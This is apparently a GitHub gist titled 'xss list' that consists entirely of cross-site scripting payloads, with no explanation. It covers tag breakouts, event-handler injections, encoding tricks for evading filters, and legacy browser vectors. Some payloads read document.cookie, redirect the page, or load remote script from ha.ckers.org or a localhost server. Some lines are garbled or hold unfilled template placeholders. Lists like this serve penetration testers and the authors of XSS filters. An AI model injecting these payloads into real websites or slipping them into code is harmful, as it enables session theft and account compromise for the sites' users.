
@mstaack
Created February 3, 2016 16:55
xss list
"></style><script>a=eval;b=alert;a(b(/ xss fired/.source));</script>'">
';alert(/xss fired/)//';alert(/xss fired/)//";alert(/xss fired/)//";alert(/xss fired/)//--></sCRipT>">'><sCRipT>alert(/xss fired/)</sCRipT>
""});});})'"--></SCRIPT>>'"</style>>'"></title>'"><marquee><h1>'"R3NW4</
h1>'"</marquee>:;'"><)<SCRIPT>prompt(/xss fired/)</SCRIPT>'"$
\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88,
115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68),
83, 83))RIPT>\">\'><SCRIPT>alert("xss fired")</SCRIPT>
';alert(/xss fired)//\';alert(1)//";alert(2)//\";al+ert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss fired/)+</SCRIPT>=&{}");}aler+t(6);function+xss(){//&q=';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/xss fired/)</SCRIPT>=&{}");}alert(6+);function+xss(){//
'|alert('xss fired')|'
'*prompt('localhost:8000
<SCRIPT>alert('xss fired');</SCRIPT>
"'/>><img+src=x onerror=prompt(/xss fired/)>
--'">"/><sVG/*_*/R3NW4/OnLoaD="window['pr\u006fmp\u0074']/*/*/('XSS')";/>
r3nw4\"'/>><svg+onload=eval(location.hash.substr(1))>#\u0077hile(\u0074rue){pr\u006fmp\u0074(/XSS/)}
‘; alert(1); var foo=’
<object data="javascript:alert('XSS')">
<isindex type=image src=1 onerror=alert('XSS')>
R3nw4_Kurdish_Hacker"><iframe/onload=alert('xss fired')>"><img src=x
onerror=prompt('xss fired');>
> \" onfocus=alert(String.fromCharCode(88,83,83,80,79,83,69,68)) autofocus>
"><svg/onload=document.location.href='https://localhost'>
R3NW4"><svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>
<iframe
src="data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4="/>
11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'xss fired
<img%09onerror=alert('xss fired') src=a>
<i onclick=alert(1)>Click here</i>
<h1 a=> onmouseover=location='jav\x41script\x3Aalert\x28"MK"\x29' >xxx <
0xE + 0xF
<title onpropertychange=javascript:alert('XSS')></title><title title=>
<img language=vbs src=<b onerror=alert#1/1#>
<img src="x:? title=" onerror=alert(1)//">
<img src="x:gif" onerror="eval('al'%2b'lert(0)')">
<img src="x:gif" onerror="window['al\u0065rt'] (/'XSS'/)"></img>
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTUE9TRUQnKTwvc2NyaXB0Pg==
data:text/html,<svg/onload=alert('xss fired')>
javascript:"<script>alert(document.domain)</script>"
<a href=[0x0b]" onclick=alert(1)//">click</a>
<!-- --!><input value="--><body/onload=`alert(/ R3NW4 /)//`">
<svg><script>/*&midast;&sol;alert(' R3NW4 ')&sol;&sol;*/</script></svg>
R3NW4"><a onmouseover%3D"alert('xss fired')">R3NW4
<script/%00%00v%00%00>alert(/R3NW4/)</script>
<x/style="position:absolute;top:0;width:100%;height:100%"onwheel=alert&lpar;xss fired&rpar;>R3NW4
<b "<script>alert(1)</script>">hola</b>
'"--><*2f*style><*2f*scRipt><scRipt>alert('xss fired')<*2f*scRipt>
/x"-prompt(/xss fired/)-"
'+confirm(/xss fired/)+'
<%tag style=”xss:expression(alert(123))”>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
/R3nw4"><img src=x onerror=prompt('xss fired')>
'></a></title><bod y onpageshow=prompt(/xss fired/)>
?r3nw4</script><svg/onload=alert(/xss fired/)//r3nw4
\x3cscript src=https://localhost:8000/1.js\x3e\x3c/script\x3e
@R3nw4<script>$='xss fired',alert($)< /script>-r3nw4/
"--> </script><svg/onload=';alert(/xss fired/);'>
%27%22%3E%3Csvg/onload=prompt%28/xss fired/%29%3E
'"--></style></script>"'/>><img+src=x onerror=alert(/xss fired/)><h1>R3NW4
"<img src=https://localhost:8000/1.js onerror=prompt('xss fired')><
"><h1>R3NW4&lt;script&gt;alert(1)&lt;/script&gt;
\x22\x3E\x3C\x2Fscript\x 3E\x3Cscript
src\x3Dhttps\x3A\x2F\x2Flocalhost:8000\x2F1.js\x3E
"><svg%2Fonload%3Dalert(%2Fxss fired%2F)>
<h1>R3NW4<br><br><br><br><img src=x
onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /><!--
<svg•onload=alert(/xss fired/)>
r3nw4"><svg onload=alert('xss fired')>
"])},alert('xss fired'));(function xss() {//
""});});});alert('xss fired');$('a').each(function(i){$(this).click(function(event){x({y
<svg onload=alert('xss fired')>
"><h1/onmouseover='alert(/xss fired/)'>xss fired
"+autofocus+onfocus%3D"alert('xss fired')
</script>< img src=x onerror=alert(/xss fired/)><!--
xss"/onmouseover="alert('XSSPosed')
">@r3nw4<svg%2Fonload%3Dalert(%2Fxss fired%2F)>
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
'"><svg/onload=alert(/xss fired/)>
"><img+src=a+onerror=prompt(/xss fired/)>
r3nw4"</title>'>><BoDy!><BODY onpageshow=prompt(/xss fired/)></
"/><iframe/onload=prompt(/xss fired/)>
<img src=x onerror=alert(/xss fired/)>
"><img+src%3Dx+onerror%3Dprompt('xss fired')>
"/onmouseover=alert(/xss fired/)>
"onerror=alert(/xss fired/)>
r3nw4-->hacker<svg/onload=alert('xss fired')//
"";<%2Fscript><script>prompt(%2Fxss fired%2F)<%2Fscript><"
"><--`<script>window.alert('localhost:8000script>--!>
r3nw4\'); alert("xss fired");//
"><script>setTimeout("alert(/xss fired/)",1000);</script><a x="
<video onerror=alert(1337) </poster>
<input onfocus=alert(1337) </autofocus>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
'"/>></script><script>alert("xss fired")</script>
</script><img src=x onerror=while(true){prompt(/xss fired/)}>
<img/id="confirm&lpar;1&#x29;"/alt="/"src="/"onerror=eval(id&#x29;>
<script>x='con';s='firm';S='(1)';setTimeout(x+s+S,0);</script>
<script </src="data:,1> (alert)(1337) "">
<script src=data:;base64,YWxlcnQoMTMzNyk=>
</title><script>alert(/xss fired/)</script>
x");$=alert, $('xss fired');//
'"/>></scr ipt><script>alert("xss fired")</script>
#prettyPhoto[r3nw4]/1,<img src=x onerror=alert(/xss fired/)>/
#prettyPhoto[gallery]/1,<a onclick="alert(/xss fired/);">/
"";</script><script>prompt(/xss fired/)</script><"
-------------------------------------------------------------
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss"
implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML
namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!--
-->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss"
DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t"
ns="urn:schemas-microsoft-com:time"><?import namespace="t"
implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS&lt;SCRIPT
DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;
charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test"
formaction="javascript:javascript:alert(1)">X
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input
autofocus>
<P STYLE="behavior:url('#default#time2')" end="0"
onEnd="javascript:alert(1)">
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import
javascript:javascript:alert(1);');}</STYLE>
<meta charset=
"x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG
SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="jav&#65ascript:javascript:alert(1)">test1</a>
<a href="jav&#97ascript:javascript:alert(1)">test1</a>
<embed width=500 height=500
code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe
srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script
&#32;
&#00;</form><input type&#61;"date" onfocus="alert(1)">
<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox &
Opera}
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT&colon;alert(1)
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/>
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click
Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.)</script .com
<iframe
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<svg contentScriptType=text/vbs><script>MsgBox
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE>
<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
<script>++1-+?(1)</script>
<body/onload=&lt;!--&gt;&#10alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
<script x> alert</script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
<form><button formaction=javascript&colon;alert(1)>CLICKME